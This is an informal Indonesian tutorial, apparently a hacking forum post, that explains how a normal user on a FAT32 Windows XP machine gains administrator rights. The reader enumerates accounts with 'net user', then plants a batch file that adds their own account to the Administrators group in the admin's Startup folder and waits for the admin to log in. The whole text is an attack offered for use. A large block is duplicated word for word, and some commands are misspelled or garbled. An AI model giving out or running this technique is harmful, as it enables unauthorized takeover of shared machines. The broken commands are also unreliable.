oke langsung aja
===> Metode exploitasi:
Windows XP yang file systemnya
adalah Fat32 memperbolehkan user biasa untuk
mengakses direktory home dari admin yang (biasanya) terletak pada
lokasi berikut:
C:\Documents and Settings\Administrator\
Sedangkan pada Windows XP yang ber file system NTFS, user biasa tidak akan bisa mengakses direktory home dari admin.
===> Exploitasi
_______________________________________________
_______________________________________________
1. Melihat User Terdaftar
C:\DOCUME~1\logic>net user
User accounts for \\logicbandit
C:\DOCUME~1\logic>net user
User accounts for \\logicbandit
________________________________________________
Administrator Guest logic
HelpAssistant SUPPORT_2856743o0 bandituser
The command completed successfully.
Melihat Akses User
C:\DOCUME~1\logicbandit user bandituser
User name bandituser
Full Name
Comment
User's comment
Country code 000 (System Default)
Account active Yes
Account expires Never
Password last set 10/10/2010 3:38 AM
Password expires Never
Password changeable 10/10/2010 3:38 AM
Password required Yes
User may change password Yes
Workstations allowed All
Logon script
User profile
Home directory
Last logon 10/10/2010 10:14 PM
Logon hours allowed All
Local Group Memberships *Administrators
Global Group memberships *None
The command completed successfully.
Kini kita sudah tau siapa yang menjadi Administrator. Buatlah script batch seperti berikut:
net localgoup Administrators logic /add
Simpan di lokasi berikut:
C:\Documents and Settings\bandituser\Start Menu\Programs\Startup
setelah itu apa yang kita lakukan?? beli kopi sama kemilan dech, loch koq ngelantur. nich yang bener berikutnya tinggal tunggu aja admin'y login, setelah itu akses kita sama seperti admin... :)
HelpAssistant SUPPORT_2856743o0 bandituser
The command completed successfully.
Melihat Akses User
C:\DOCUME~1\logicbandit user bandituser
User name bandituser
Full Name
Comment
User's comment
Country code 000 (System Default)
Account active Yes
Account expires Never
Password last set 10/10/2010 3:38 AM
Password expires Never
Password changeable 10/10/2010 3:38 AM
Password required Yes
User may change password Yes
Workstations allowed All
Logon script
User profile
Home directory
Last logon 10/10/2010 10:14 PM
Logon hours allowed All
Local Group Memberships *Administrators
Global Group memberships *None
The command completed successfully.
Kini kita sudah tau siapa yang menjadi Administrator. Buatlah script batch seperti berikut:
net localgoup Administrators logic /add
Simpan di lokasi berikut:
C:\Documents and Settings\bandituser\Start Menu\Programs\Startup
setelah itu apa yang kita lakukan?? beli kopi sama kemilan dech, loch koq ngelantur. nich yang bener berikutnya tinggal tunggu aja admin'y login, setelah itu akses kita sama seperti admin... :)